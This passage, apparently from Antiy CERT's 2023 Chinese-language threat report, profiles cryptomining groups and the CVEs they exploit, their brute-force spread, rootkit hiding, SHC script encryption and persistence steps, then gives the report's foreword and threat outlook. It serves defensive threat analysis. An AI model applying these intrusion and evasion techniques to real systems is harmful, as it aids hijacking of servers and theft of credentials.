Miner、TeamTNT和“8220”等。这一趋势预示着未来这类工具的流行程度将进一步上升。Rootkit内核级工具之所以受到青睐,主要是因为它们能够在系统的最底层进行潜伏,从而提供更深层次的隐蔽性和控制力。这些工具能够直达操作系统的核心,加载恶意的内核模块,以实现避免被传统安全软件检测到的状态。它们可以有效地隐藏恶意进程和文件,由于这些工具对系统的高级控制,即便是系统重启,它们也能够持续在后台运行,确保持续的挖矿活动不受干扰。随着挖矿木马攻击者对利润的不断追求,结合Rootkit技术的挖矿木马将变得越来越复杂。它们不仅仅满足于利用受害者的计算资源,更可能进行更为深入的网络渗透,对网内其他终端造成潜在威胁。 3.3 SHC加密脚本促使挖矿木马更加隐蔽 2023年,安天CERT对监测到的挖矿木马进行了梳理,发现挖矿木马攻击者为了逃避安全检测,开始采用各种混淆和加密技术来隐藏其恶意代码。其中,使用Shell脚本编译器(SHC)对脚本进行加密的做法愈发流行,SHC成为了攻击者新的工具选择,以增强其挖矿脚本的隐蔽性。SHC是一种将Shell脚本加密成二进制可执行文件的工具,它可以有效地隐藏脚本的源代码,从而使得分析人员难以直接查看代码内容。这种加密不仅可以防止脚本源代码被分析,还可以绕过基于签名的检测机制,因为每次加密后生成的二进制文件都具有不同的签名。安天CERT在2023年先后分析了Hoze、yayaya Miner和Diicot等挖矿木马,均利用SHC加密的脚本发起初始攻击,这种攻击方式为挖矿木马的传播提供了便利,加剧了用户系统被感染的风险。 4.活跃挖矿木马介绍 4.1 “8220” “8220”是一个长期活跃并且擅长使用漏洞进行攻击并部署挖矿程序的组织,该组织早期使用Docker镜像传播挖矿木马,后来逐步利用多个漏洞进行攻击,如WebLogic漏洞、Redis未授权访问漏洞、Hadoop Yarn未授权访问漏洞和Apache Struts漏洞等。在2020年发现该组织开始使用SSH暴力破解进行横向攻击传播。自Apache Log4j 2远程代码执行漏洞曝光后,该组织利用该漏洞制作漏洞利用脚本进行传播,影响范围广。 4.1.1 组织概览 表4-1 “8220”挖矿组织介绍 组织名称:“8220” 出现时间:2017年 针对平台:Windows、Linux 传播方式:SSH暴力破解、Docker镜像和漏洞利用 利用的漏洞:Apache Log4j 2远程代码执行漏洞、Oracle WebLogic漏洞、Atlassian Confluence漏洞、Redis未授权访问漏洞、Hadoop Yarn未授权访问漏洞、Apache Struts漏洞 挖矿币种:门罗币(XMR) 4.1.2 典型案例 ● “8220”挖矿组织活动分析 2022年1月,安天CERT陆续捕获到多批次“8220”挖矿组织攻击样本,该挖矿组织自2017年出现,持续活跃,同时向Windows与Linux双平台传播恶意脚本,下载的载荷是门罗币挖矿程序以及其他僵尸网络程序、端口扫描暴力破解工具等[1]。 ● “8220”挖矿组织最新挖矿活动分析 在2023年1月到2月期间,研究人员观察到一个针对Oracle Weblogic Server的攻击负载。该负载提取了ScrubCrypt,通过对应用程序进行混淆和加密,使其能够规避安全程序。此外,已经有了更新版本,并且卖家网页上承诺可以绕过Windows Defender并提供反调试和一些绕过功能。通过分析被注入受害者系统中的恶意软件,研究人员确定了攻击者为“8220”挖矿组织,并详细阐述了ScrubCrypt和此加密器在过去传递的其他恶意软件的细节[2]。 ● 针对Oracle WebLogic漏洞的攻击活动分析 “8220”挖矿组织自2017年起一直活跃,并持续扫描云和容器环境的易受攻击应用程序。他们以部署加密货币挖矿程序为目的,攻击了Oracle WebLogic、Apache Log4j、Atlassian Confluence漏洞和配置错误的Docker容器。该组织曾使用Tsunami恶意软件、XMRig加密挖矿程序、masscan和spirit等工具。最近的攻击中,研究人员观察到他们利用了CVE-2017-3506漏洞对Oracle WebLogic进行攻击。这个漏洞影响了Oracle WebLogic的WLS安全组件,攻击者可以利用特定的XML文档通过远程的HTTP请求来执行任意命令,从而获取对敏感数据的未经授权访问或者入侵整个系统[3]。 4.2 Outlaw Outlaw挖矿僵尸网络最早于2018年被发现,主要针对云服务器实施挖矿攻击,持续活跃。疑似来自罗马尼亚,最早由趋势科技将其命名为Outlaw,中文译文为“亡命徒”。该挖矿僵尸网络首次被发现时,攻击者使用Perl脚本语言的后门程序构建机器人,因此被命名为“Shellbot”。其主要传播途径是SSH暴力破解攻击目标系统并写入SSH公钥,以达到长期控制目标系统的目的,同时下载基于Perl脚本语言编写的后门和开源门罗币挖矿木马。 4.2.1 组织概览 表4-2 Outlaw挖矿僵尸网络介绍 组织名称 Outlaw 组织介绍 一个通过漏洞利用和SSH暴力破解传播基于Perl语言编写的Shellbot而组建的僵尸网络,后期开始投放挖矿木马获利 首次披露时间 2018年11月1日 首次披露厂商 趋势科技 归属国家 疑似罗马尼亚 命名原因 源自罗马尼亚语haiduc的翻译,该组织主要使用的黑客工具Haiduc 威胁类型 僵尸网络、挖矿木马 针对目标 Linux、IoT 传播途径 Shellshock(CVE-2014-7169)漏洞、Drupalgeddon2漏洞(CVE-2018-7600)漏洞和SSH暴力破解,主要采用后者,漏洞利用只在初期使用过 组织组件 隐藏进程工具(XHide)、SSH暴力破解工具(Haiduc、ps、tsm)、Shellbot程序、挖矿木马(XMRig) 版本迭代 该僵尸网络样本共有5个版本迭代,主要区别在于功能的新增,破解工具替换,破解工具功能的变化上 4.2.2 典型案例 ● 典型挖矿家族系列分析一丨Outlaw(亡命徒)挖矿僵尸网络 Outlaw挖矿僵尸网络首次被发现于2018年11月,当时其背后的攻击者只是一个通过漏洞入侵IoT设备和Linux服务器并植入恶意程序组建僵尸网络的组织,主要从事DDoS攻击活动,在暗网中提供DDoS出租服务。在后续的发展过程中,受虚拟货币升值影响,也逐步开始在僵尸网络节点中植入挖矿木马,并利用僵尸网络对外进行渗透并扩张,获得更大规模的计算资源,旨在挖矿过程中获取更多的虚拟货币速配[4]。 ● Outlaw黑客组织重新浮出水面 2022年2月,研究人员发现了一起涉及恶意脚本和恶意软件的服务器入侵事件。通过识别的攻击特征(SSH密钥注释、恶意工具和脚本名称、目录结构),可以确定这次攻击与2018年TrendMicro发现的Outlaw黑客组织的攻击非常相似。Outlaw黑客组织最初在2018年瞄准汽车和金融行业,近期再次出现的活动证明了该组织从未停止活动并且与过去相比有所进化。Outlaw在过去曾针对欧洲进行广泛攻击,新出现的活动可能也是如此。调查还发现了攻击者的持续性手段,以及攻击者曾经使用的恶意工具,这些工具显示了Outlaw活动模式中的某种演进[5]。 4.3 WatchDog WatchDog挖矿组织自2019年1月被发现,得名于Linux守护进程watchdogd,主要利用暴露的Docker Engine API端点和Redis服务器发起攻击,并且可以快速的从一台受感染的机器转向整个网络。WatchDog挖矿程序由三部分组成,Go语言二进制集和一个bash或PowerShell脚本文件组成。这些二进制文件执行特定功能,其中之一是模拟Linux的watchdogd守护程序功能,以确保挖矿过程不会挂起、负载过载或意外终止。第二个Go二进制文件在提供了针对Linux或Windows系统的目标针对性操作功能后,下载了可配置的IP地址网段列表。最后,第三个Go二进制脚本将使用来自初始化的bash或PowerShell脚本的自定义配置,在Windows或Linux操作系统上启动一个挖矿操作。WatchDog使用Go二进制文件来执行不同操作系统上的操作,例如Windows和Linux,只要目标系统安装了Go语言平台。 4.3.1 组织概览 表4-3 WatchDog挖矿组织介绍 组织名称 WatchDog 出现时间 2019年1月 针对平台 Windows、Linux 传播方式 暴露的Docker Engine API端点 Redis服务器 利用的漏洞 CVE-2014-3120 CVE-2015-1427 CVE-2018-1273 …… 挖矿币种 门罗币(XMR) 4.3.2 典型案例 ● atchDog挖矿组织近期活动分析 2023年,安天CERT捕获了一批活跃的WatchDog挖矿组织样本,该组织主要利用暴露的Docker Engine API端点和Redis服务器发起攻击,并且可以快速的从一台受感染的机器转向整个网络。WatchDog挖矿组织自2019年1月开始被发现,至今仍然活跃。WatchDog挖矿组织主要利用暴露的Redis服务器发起攻击。在Windows端,首先会从放马服务器上下载名为“init.ps1”的PowerShell脚本,该脚本会分别下载挖矿程序进行挖矿、漏洞扫描程序进行扫描、守护进程对挖矿进程进行守护、脚本文件回传主机名及IP地址、exe文件添加管理员组等。在Linux端,会从放马服务器上下载名为“init.sh”的sh脚本,该脚本同样会下载Linux端的挖矿程序、漏洞扫描程序和守护进程,他们的功能与Windows端一样。另外,该脚本还具有以下功能:清空防火墙规则、清除日志、创建计划任务、结束安全产品、添加SSH公钥、结束竞品挖矿、横向移动和结束特定网络连接等[6]。 ● WatchDog随着新的多阶段挖矿攻击而演变 WatchDog挖矿组织正在开展一项新的挖矿活动,采用先进的入侵、蠕虫病毒传播和规避安全软件的技术。该挖矿组织的目标是暴露的Docker Engine API端点和Redis服务器,并且可以快速从一台受感染的机器转向整个网络。WatchDog通过使用开放端口2375破坏配置错误的Docker Engine API端点来发起攻击,使它们能够在默认设置下访问守护进程[7]。 4.4 TeamTNT TeamTNT挖矿组织最早于2019年被发现,主要针对Docker Remote API未授权访问漏洞、配置错误的Kubernetes集群和Redis服务暴力破解进行攻击。入侵成功后,窃取各类登录凭证并留下后门,主要利用目标系统资源进行挖矿并组建僵尸网络。经过近几年发展,该组织控制的僵尸网络规模庞大,所使用的攻击组件更新频繁,是目前针对Linux服务器进行挖矿的主要攻击组织之一。该组织疑似来自德国,其命名方式依据该组织最早使用teamtnt.red域名进行命名。 4.4.1 组织概览 表4-4 TeamTNT挖矿组织介绍 组织名称 TeamTNT 首次披露时间 2019年10月 归属国家 德国 命名原因 最早使用teamtnt.red域名 威胁类型 挖矿木马、后门 针对目标 JupyterLab、Docker、Kubernetes和Redis 传播途径 错误的配置和SSH凭证等 组织武器库 Tsunami、Rathole、Ezuri、Punk.py、libprocesshider、tmate、masscan、pnscan、ZGrab、Tiny Shell、Mimipy、BotB、Diamorphine、Docker Escape Tool等 组织擅长技术 扫描局域网端口、添加防火墙规则、删除其他竞争对手进程、创建持久性计划任务、窃取服务凭证、收集机器信息、Rootkit隐藏进程、部署挖矿程序和横向移动等 推特账户 HildeGard@TeamTNT@HildeTNT GitHub账户 hilde@TeamTNT HildeTeamTNT 托管网站 teamtnt.red 4.4.2 典型案例 ● 针对云原生环境的挖矿攻击活动 2023年7月,研究人员发现针对云原生环境的攻击活动,并发现了用于实施攻击的基础设施。该基础设施处于测试和部署的早期阶段,主要针对暴露的JupyterLab和DockerAPI进行攻击,以此传播Tsunami恶意软件,并进行进一步的云凭据劫持、资源劫持和蠕虫感染等攻击活动。对相关基础设施进行调查后,研究人员表示此次攻击活动可能与TeamTNT组织相关[8]。 ● 针对多个云服务平台进行挖矿攻击活动 研究人员发现,此前针对亚马逊网络服务(AWS)证书进行窃密的攻击者,在2023年6月期间在其工具中扩展了针对Azure和Google云平台的模块。研究人员认为此次攻击活动与TeamTNT组织相关联。研究人员在此次攻击活动中发现了标志性的shell脚本,并发现了使用Golang编写的恶意ELF文件。其中值得注意的一点是,攻击者在其脚本中新增了针对Azure和Google云平台的功能,虽然该函数没有被调用,但这表明这些功能正在积极开发中,并可能会被用于此后的攻击活动中[9]。 4.5 H2Miner H2Miner挖矿木马最早出现于2019年12月,爆发初期及此后一段时间该挖矿木马都是针对Linux平台,直到2020年11月后,开始利用WebLogic漏洞针对Windows平台进行入侵并植入对应挖矿程序。此外,该挖矿木马频繁利用其他常见Web组件漏洞,入侵相关服务器并植入挖矿程序。例如,2021年12月,攻击者利用Log4j漏洞实施了H2Miner挖矿木马的投放。 4.5.1 组织概览 表4-5 H2Miner挖矿组织介绍 组织名称 H2Miner/Kinsing 出现时间 2019年12月 针对平台 Windows、Linux 传播方式 漏洞利用 利用的漏洞 Looney Tunables特权升级漏洞 Apache ActiveMQ RCE漏洞(CVE-2023-46604) Apache Solr’s DataImportHandler (CVE-2019-0193) Redis未授权RCE Confluence未授权RCE(CVE-2019-3396) WebLogic RCE漏洞(CVE-2020-14882/14883) Log4j漏洞(CVE-2021-44228) …… 挖矿币种 门罗币(XMR) 4.5.2 典型案例 ● Kinsing组织利用Looney Tunables漏洞进行攻击活动 研究人员发现Kinsing组织正在尝试利用披露的名为Looney Tunables的Linux特权升级漏洞,以此入侵云环境。Kinsing组织会获取并执行额外的PHP漏洞利用,去混淆后发现是一个用于进一步攻击活动的JavaScript恶意代码。该JavaScript代码是一个Web Shell,允许攻击者获得服务器的后门访问权限,从而能够执行文件管理、命令执行,并收集有关运行在上面的机器的更多信息。与Kinsing组织以往部署恶意软件和挖矿木马的攻击模式不同,此次攻击的最终目标似乎是窃取与云服务提供商相关的凭据数据[10]。 ● Kinsing组织利用CVE-2023-46604漏洞进行攻击活动 Kinsing组织正在利用Apache ActiveMQ RCE漏洞(CVE-2023-46604)进行攻击活动,该组织在易受攻击的系统上执行挖矿程序和恶意软件。在启动挖矿程序之前,Kinsing通过终止任何相关进程、crontabs和网络连接来检查机器上是否有其他的Monero挖矿程序。之后,它通过cronjob建立持久性,该cronjob用于获取其感染脚本的最新版本,并将rootkit添加到/etc/ld.so.preload中[11]。 4.6 Sysrv-hello Sysrv-hello挖矿木马于2020年12月31日被首次披露,通过漏洞传播,无针对性目标,蠕虫样本更新频繁,是一个活跃在Windows和Linux的双平台挖矿蠕虫。根据其近两年的活动,可将其发展分为三个阶段:前期尝试传播、中期扩大传播和后期注重防御规避并维持传播力度。从三个阶段的样本分析看,其背后黑产组织并不重视维持对目标主机的访问权限,只在中期和后期的Redis漏洞利用中添加了在目标系统中植入SSH公钥的功能;其更加注重收益,尽可能扩展和维持传播能力,由于其后期矿池连接方式采用矿池代理,无法获取其全面的收益情况,但在2021年3月份期间平均每两天收益一个门罗币,按当时市价,即平均每天收益100美元。 4.6.1 组织概览 表4-6 Sysrv-hello挖矿组织介绍 组织名称 Sysrv-hello 首次披露时间 2020年12月31日 命名原因 捕获的大量样本原始文件名以“sysrv“字符串为主,且样本内使用的函数或模块路径中均包含“hello”字符串。 威胁类型 挖矿、蠕虫 针对目标 无特殊针对目标、蠕虫传播目标随机化,针对包括云主机在内的目标 传播方式 漏洞利用、暴力破解、受害主机上存储的SSH私钥 传播组件 Laravel Debug mode RCE (CVE-2021-3129) XXL-JOB executor 未授权访问漏洞 Jenkins RCE漏洞(CVE-2018-1000861) Jupyter 未授权访问漏洞 Nexus Repository Manager 3 RCE漏洞 (CVE-2019-7238) ThinkPHP5 RCE漏洞 WebLogic RCE漏洞(CVE-2020-14882) Hadoop YARN REST API未授权漏洞 Supervisord RCE漏洞(CVE-2017-11610) Wordpress-XMLRPC暴力破解 JBOOS反序列化漏洞(CVE-2017-12149) SSH弱口令暴力破解 PostgreSQL RCE漏洞(CVE-2019-9193) Tomcat弱口令暴力破解 Confluence未授权RCE漏洞(CVE-2019-3396) Redis弱口令暴力破解 Apache Struts2 RCE漏洞(CVE-2017-5638) Nexus弱口令暴力破解 PHPUnit RCE漏洞(CVE-2017-9841) Jupyter弱口令暴力破解 Spring Cloud Gateway Actuator RCE漏洞 (CVE-2022-22947 ) Jenkins弱口令暴力破解 GitLab CE/EE RCE漏洞(CVE-2021-22205) MySQL弱口令暴力破解 4.6.2 典型案例 ● 典型挖矿家族系列分析三 | Sysrv-Hello挖矿蠕虫 Sysrv-hello是一个利用多种漏洞传播的Windows和Linux双平台挖矿蠕虫,主要目的在于传播挖矿蠕虫,继而实现挖矿获利。该挖矿蠕虫于2020年12月31日被首次披露,由于捕获的大量样本原始文件名以“sysrv”字符串为主,且样本内使用的函数或模块路径中均包含“hello”字符串,研究人员将其命名为Sysrv-hello。Sysrv-hello挖矿蠕虫传播的文件主要有核心脚本、蠕虫母体及挖矿程序。其中核心脚本文件类型有Shell和PowerShell,主要承担下载并执行蠕虫,Linux脚本功能包括结束竞品、防御规避、持久化、横向传播等功能,PowerShell脚本更聚焦在防御规避和持久化上;蠕虫母体是由Golang语言编写,利用各种漏洞进行核心脚本的传播,进而实现自身的间接传播;挖矿程序负责劫持目标主机计算资源以此实施挖矿,该程序主要通过蠕虫母体释放并执行,但存在一段时间由核心脚本负责下载和执行[12]。 4.7 libgcc_a 2023年,安天CERT接到多起挖矿木马应急响应事件,经过排查发现,多起应急响应事件均与libgcc挖矿木马有关,该挖矿木马在Linux系统上主要以SSH暴力破解进行传播,在Windows系统上主要以RDP暴力破解进行传播。挖矿木马在感染受害主机后,还会进行横向传播进一步感染网内其他主机。利用多种防御手段进行反检测,如会采用开源rootkit工具r77-rootkit,这个工具具有ring 3隐藏功能,可以隐藏文件、目录、进程和CPU的使用情况、注册表项和值、服务、TCP和UDP连接、连接点、命名管道和计划任务等。另外攻击者使用开源门罗币挖矿程序XMRig进行挖矿,在Windows平台利用netpass工具读取本地明文RDP密码等。 4.7.1 组织概览 表4-7 Libgcc_a挖矿组织介绍 组织名称 libgcc_a/Warmup 出现时间 2023年 针对平台 Windows、Linux 传播方式 RDP暴力破解 SSH暴力破解 利用的漏洞 无 挖矿币种 门罗币(XMR) 4.7.2 典型案例 ● 揭露r77 Rootkit于XMRig挖矿程序联合部署 研究人员发现了一种恶意加密挖矿器,该挖矿器在亚洲多个国家部署。攻击者利用名为r77的开源用户态Rootkit。r77的主要目的是通过hooking重要Windows API来隐藏系统中其他软件的存在,这使其成为了进行隐秘攻击的理想工具。通过利用r77 Rootkit,恶意加密挖矿器的作者能够逃避检测并持续其攻击活动[13]。 4.8 Kthmimu Kthmimu挖矿木马主要通过Log4j 2漏洞进行传播。自Log4j 2漏洞曝光后,该木马挖矿活动较为活跃,同时向Windows与Linux双平台传播恶意脚本,下载门罗币挖矿程序进行挖矿。该挖矿木马在Windows平台上使用PowerShell脚本下载并执行门罗币开源挖矿程序XMRig。除此之外,该脚本还具有创建计划任务持久化、判断系统用户包含关键字符串和创建计划任务等功能。在Linux平台上,木马使用Shell脚本下载挖矿程序,并且该脚本还会清除具有竞争关系的其它挖矿程序、下载其它脚本和创建计划任务等功能。 4.8.1 组织概览 表4-8 Kthmimu挖矿组织介绍 组织名称 Kthmimu 出现时间 2022年3月 针对平台 Windows、Linux 传播方式 漏洞利用 利用的漏洞 Apache Log4j 2远程代码执行漏洞 挖矿币种 门罗币(XMR) 4.8.2 典型案例 ● 活跃的Kthmimu挖矿木马分析 自2022年3月以来,安天CERT陆续捕获到Kthmimu挖矿木马攻击样本,该木马主要通过Log4j 2漏洞进行传播。自Log4j 2漏洞曝光后,该木马挖矿活动较为活跃,同时向Windows与Linux双平台传播恶意脚本,下载门罗币挖矿程序进行挖矿[14]。 4.9 aminer 2023年6月,安天CERT通过捕风蜜罐系统捕获了一批活跃的挖矿木马样本,该挖矿木马主要利用SSH和Redis弱口令暴力破解对Linux平台进行攻击。由于其初始脚本中下载挖矿文件的名称为“aminer.gz”,因此安天CERT将该挖矿木马命名为“aminer”。 4.9.1 挖矿木马概览 表4-9 aminer挖矿木马介绍 挖矿木马名称 aminer 出现时间 2022年6月 活跃时间 2023年5月 针对平台 Linux 传播方式 SSH和Redis弱口令暴力破解 主要技术特点 持久化;irc后门;隐藏行为等 挖矿币种 门罗币(XMR) 4.9.2 典型案例 ● aminer挖矿木马活动分析 aminer挖矿木马初始攻击脚本实际由一连串指令组成,其中包括写入指定DNS服务器地址、使用yum包管理器安装一系列工具和库、下载install.tgz文件解压后执行install脚本、下载ns2.jpg文件内存执行、下载aminer.gz文件解压后执行start脚本进行挖矿。install.tgz文件中包含很多与系统文件重名的恶意文件,如top等。这些文件均由install脚本调用,主要功能包括添加SSH公钥、替换系统文件如top、netstat、crontab等、执行irc客户端建立后门、过滤端口号为20和43的网络连接等。ns2.jpg实际为Perl语言编写的脚本文件,用于实现ShellBot功能。运行后会连接irc服务器,端口号为20。aminer.gz压缩包中包含针对两种操作系统架构的挖矿程序,start脚本执行后会根据当前受害者的操作系统架构决定使用哪个挖矿程序,创建一个服务进行持久化,最后执行挖矿程序进行挖矿[15]。 4.10 Diicot Diicot挖矿组织(也称color1337、Mexals),以互联网下暴露22端口的设备作为攻击目标,使用SSH暴力破解工具实施入侵。成功后,根据设备CPU性能,利用托管网站下发不同载荷。当设备性能较弱时,从托管网站下载相应工具和脚本,实施扫描和暴力破解进行传播;当设备性能较强时,下载挖矿程序进行挖矿。 4.10.1 组织概览 表4-10 Diicot挖矿组织介绍 组织名称:Diicot 出现时间:2022年10月 针对平台:Linux 传播方式:SSH暴力破解 挖矿币种:门罗币(XMR) 技术特点:主动扫描22端口;SHC加密;清除和创建定时任务;更改root账户密码;结束竞品程序;执行挖矿程序;SSH暴力破解; 4.10.2 典型案例 ● Diicot挖矿组织近期攻击活动分析 2023年6月,国家计算机网络应急技术处理协调中心(CNCERT/CC)和安天联合监测发现Diicot挖矿组织(也称color1337、Mexals)频繁发起攻击活动,境内受害服务器多达600余台。通过对攻击者使用的C2资源进行分析发现,攻击者于2022年10月13日至2023年5月27日期间不断更新攻击载荷,增加shc加密等手法以达成免杀的目的。跟踪监测发现2023年3月1日至今,境内受害服务器(以 IP 数计算)累计600余台[16]。
blog
导语 每年年初对上一年度全球网络安全威胁的情况进行分析和总结,发布整体回顾,进行新年展望,是安天研究与应急处理中心(安天CERT)坚持多年的传统,对安天来说,这就是“年报”。年报的编写通常从每年11月开始准备,在12月底完成初稿,在1月上旬的网络安全冬训营上发布年报的“征求意见版”,征求参会专家的意见建议,之后进行补充完善,并在春节前后正式公布。但如果细心人浏览,安天过去几年的威胁年报,会发现其都是“征求意见版”,说明报告最终未通过安天技术委员会的审核,只能以“征求意见版”完成发布。对安天CERT来说这是年度工作未完全闭合的遗憾,对整个安天来说,这是面对场景、威胁、客户的巨大变化中,知行脱节的迷茫。 早期的“年报”并不依赖安天CERT输出,基本上将年度样本分析平台各个维度关于恶意代码的统计输出,再辅以简单的说明,就可以以很小的人力投入完成工作。也符合彼时,安天再产业体系中,只是作为反病毒引擎上游厂商,而不直接面对政企客户场景的简单定位。但从震网事件开始,安天的分析溯源能力向防御场景伸展,安天着手研发全主机平台防护的内核和产品,同时也发布辅助溯源猎杀的流量侧和系统侧工具。我们看到APT攻击的高度定向性化的杀伤链与复杂的IT场景叠加;各种不同的威胁行为体的攻击活动都在挑战网络安全治理时。这些样貌,越来越不是简单的统计分析所能代表。因此我们提出了从数据型年报,走向观点型的思路,并坚持数年,其中不乏若干我们引为自豪的预见,其中包括“勒索软件将与蠕虫合流”,“勒索攻击将具备APT的能力”等带有一定前置性的风险示警,但在WarryCry的大爆发、还是RaaS(勒索即服务)与定向攻击的合流真正发生时,我们却无法因准确做出了提前示警而“欣慰”,因为我们无法判断我们“前置示警”是否让用户做出了 “前置防御”,甚至对很多IT设施的防护能力提升俩看,我们还没有看到“灾难以进步为补偿”(恩格斯语)。也因为此,作为威胁分析者和检测能力的赋能方,我们要发现重要问题,也要提出关键解法——这就是两年来,安天倡导和践行的执行体治理安全理念。 与此同时,我们今年对年报结构的进行了新的重大调整,增加2023年度威胁执行体与战术统计分析。这是恶意代码全貌再次回归到“年报”当中。数年前,我们认为这些枯燥的分类统计和饼图柱图,已经并不能对读者带来更多的观测价值。但我们在这几年很沉重的发现,由于缺少恶意代码的种类、数量全貌的持续发布,部分用户开始忽视反恶意代码和主机安全防护的基础能力建设,而更关注对齐更多安全手段,忘记了恶意代码检测并非一项功能开关,反病毒引擎是需要全面捕获能力、海量分析算力和专业分析团队的来支撑的安全能力。这也是我们首次发布TOP10的攻击高频应用的非恶意执行体。我们也基于对攻击事件中攻击技战术分析的累计,发布了ATT&CK年度攻击技战术TOP10。 我们今年强化了威胁趋势的总结,增加了防御和治理思考。需要说明的是,在年报启动编写的时点,也正是是多起Lockbit组织系列重大定向勒索攻击被关注的时点,因此我们将年报关于威胁总结和防御治理思考中与定向勒索攻击相关内容提前输送到了《波音遭遇勒索攻击事件分析复盘—定向勒索的威胁趋势分析与防御思考》分析报告中。 在威胁分析方面与往年结构类似,安天也总结了高级持续性威胁(APT)、勒索威胁、挖矿威胁、其他黑产威胁,数据泄露威胁以及威胁泛化等方向的思考与观点。 网络攻击并不是简单的是一种技术行为,其是特定组织和个体带有特定意图所开展的特殊行为活动。因此分析网络攻击从战术和防护角度,既要以其载荷(执行体)和战术为重点,以资产环境为场景。同时也要关注其背后的动机和威胁行为体,同时要把对被攻击目标影响后果损失的分析,叠加国家安全、社会治理安全和相关的公民个人安全的层面进行分析。 表格 1 2023年典型网空威胁行为体作业动机、战术特点、目标资产和业务后果对比表 关于高级持续性威胁(APT):安天梳理了2023年全球APT组织及行动的分布和活跃情况,制作了“全球APT攻击行动、组织归属地理位置分布(活跃)图”,其中APT组织共556个,而代表最高攻击水平的A2PT攻击组织全部分布在美国。其他对我国和周边国家地区有较高威胁的攻击组织来自印度等国家和我国台湾地区。我们选取2023年典型代表网空威胁行为体,分析他们的威胁等级,发起攻击活动的动机因素、战术特点、目标资产和产生业务后果,尽可能的展示2023年网络空间的威胁全貌,通过分析发现,网空霸权和地缘安全博弈依然是当前网空攻击的主要持续性动机和因素,该类攻击代表当前网空攻击的最高能力,其目标广度和深度均全面覆盖,造成后果也最为严重;地域性临时冲突则是今年网空攻击的阶段性上升因素,此类攻击以俄乌冲突和巴以冲突背景下的网空攻击活动为代表,其战术特点根据各方能力有所不同,但总体围绕情报获取、制造混乱和毁瘫为作业目的;利益和金钱则是近些年网空攻击持续上升的动机和因素,随着加密货币和RaaS模式的兴起,其善于利用漏洞窗口期,攻击活动越发频繁,造成危害也越来越大;而意识形态、宗教冲突等则是特定区域或组织发起网空攻击的动机和因素,其作业主要以意识形态传播、威胁恐吓、制造恐慌为目的;最后则是技术研究和炫技的个人黑客攻击活动的动机和因素,其目标不定且部分没有明确目的,造成后果危害相对一般。 智能移动终端设备面临A2PT的攻击挑战,闭源系统反而由于其系统和生态特性一旦被攻击可能长期不被发现,当前的手机和智能终端的安全性除依托系统本身还需要更多的安全关注。 APT组织借鉴公开情报制作假旗隐蔽攻击线索,通过制造、遗留明显的假旗线索误导分析人员的溯源调查方向,甚至可以起到瞒天过海的效果,但经验丰富的研究人员仍可发现技术细节中的矛盾之处。 A2PT组织的高阶攻击技术因曝光示范和失控泄露的等原因,被更多APT组织广泛采纳应用于自身行动中,定向勒索等黑产活动,也在跟进模仿,传统中低等级的APT组织和黑产攻击都将因此更难发现、防御与溯源。 关于勒索威胁:勒索攻击的主流威胁形态已经从勒索团伙传播扩散或广泛投放勒索软件收取赎金,转化为RaaS+定向攻击收取高额赎金的运行模式。RaaS为Ransomware as a Service(勒索即服务)的缩写,是勒索团伙研发运营的勒索攻击基础设施,包括可定制的破坏性勒索软件、窃密组件、勒索话术和收费通道等。各种攻击团伙和个人租用RaaS攻击基础设施,在获得赎金后,与RaaS攻击组织分账结算。随着RaaS的兴起,勒索攻击不再有技术门槛,通过简单的页面点击,即定制可生成窃密、勒索等攻击载荷,因此内部人员攻击可能激增,更需要警惕传统电诈犯罪转化为社工+勒索攻击犯罪。与此同时,针对大型政企机构,实施定向勒索攻击的行为体已具备APT水平,定向勒索攻击成为大型政企机构的噩梦。勒索攻击已经是由持续定向入侵、窃取数据、加密数据瘫痪系统、勒索金钱、挖掘数据关联价值二次利用、贩卖数据、向监管机构举报、公开窃取数据所构成的一条价值侵害链,而且已经形成了一个规模极为庞大的犯罪产业。在这样的背景下,遭遇勒索攻击的风险已经不是简单的以数据损失和业务暂停为后果的形态,而是要付出失窃的所有数据均会被贩卖、公开等一系列的连锁风险。 关于挖矿威胁:未来的挖矿木马将出现更多的由AI生成的挖矿脚本,这将继续降低攻击者的成本。随着挖矿木马攻击者对利润的不断追求,结合Rootkit技术的挖矿木马将变得越来越复杂。使用Shell脚本编译器(SHC)对脚本进行加密的做法也愈发流行,SHC成为了攻击者新的工具选择,以增强其挖矿脚本的隐蔽性。 关于黑产威胁:2023年,来自黑产团伙的威胁呈现出手段不断变化和资源快速更换等特点。以2023年最活跃的黑产团伙“游蛇”为例,其针对我国国内用户的网络钓鱼攻击和诈骗活动,规模较大且持续时间较长,对企业造成了一定的经济损失。这类黑产团伙传播的恶意程序变种多、免杀更新速度快、基础设施更换频繁、攻击目标涉及行业领域广泛。从攻击手段看,以“白加黑”加载恶意载荷、内存执行Shellcode、内存解密载荷文件为主。安天CERT将具有上述特点的黑产团伙统称为“游蛇”。 关于数据泄露威胁:一些组织存储的高价值的数据资产成为了攻击者的目标,勒索威胁伴随着数据泄露的风险,利用高危漏洞引发的数据泄露造成的影响也不容小觑,政治因素引发的数据泄露甚至能影响国际形势。 关于威胁泛化:威胁泛化导致用户的资产暴露面增加,攻击者利用增加的攻击面可以产生非授权访问、跳板攻击、入侵“隔离网络”、资产被控、资产破坏、数据泄露等广泛的安全威胁。 2.2023年度威胁执行体和攻击战术的整体情况 武器和战术是分析网络攻击的两个重要基本要素,攻击武器,即我们常说的攻击载荷,绝大多数是“执行体”,攻击战术也依托执行体封装执行。多数攻击武器是以攻击为目的所开发的恶意代码(恶意执行体),为了进一步规避检测,攻击者也开始使用正常软件(非恶意执行体)与恶意执行体组合投放作业达成攻击目的。 2.1 2023年恶意代码执行体分析统计 截至2023年12月31日,安天捕获有效恶意代码执行体总量为1,361,149,760个(按MD5值统计),即13亿6114万9760个,并可以映射到百亿规模的HASH样本空间。(安天坚持有效样本的统计原则,以避免统计对判断的干扰,包括:对感染式病毒、变形病毒、宏病毒、云端变形投放(Poly by Server)等情况,均依托按照文件透结构、宿主文件大小定义,均按照技术规范所需的样本数量的上线统计,以避免大量HASH不同但实际病毒体一致的数量干扰。后续涉及样本统计,均指有效样本)安天依据恶意代码样本的8个基础分类,即特洛伊木马(Trojan)、蠕虫(Worm)、感染式病毒(Virus)、黑客工具(HackTool)、灰色软件(Grayware)、风险软件(Riskware)、测试文件(TestFile)和垃圾文件(JunkFile),据此分类统计,如图1-1所示: 数量最多的前三个分类依次是特洛伊木马、灰色软件和感染式病毒,恶意代码执行体数量分别为732,421,518个、244,231,566个和185,051,567个,占比分别为53.81%、17.94%和13.60%。 其中,2023年度新增捕获恶意代码执行体数量为157,328,081个(按MD5值统计),即1亿5732万8081个。依据恶意代码的8大基础分类,统计数据如图1-2所示: 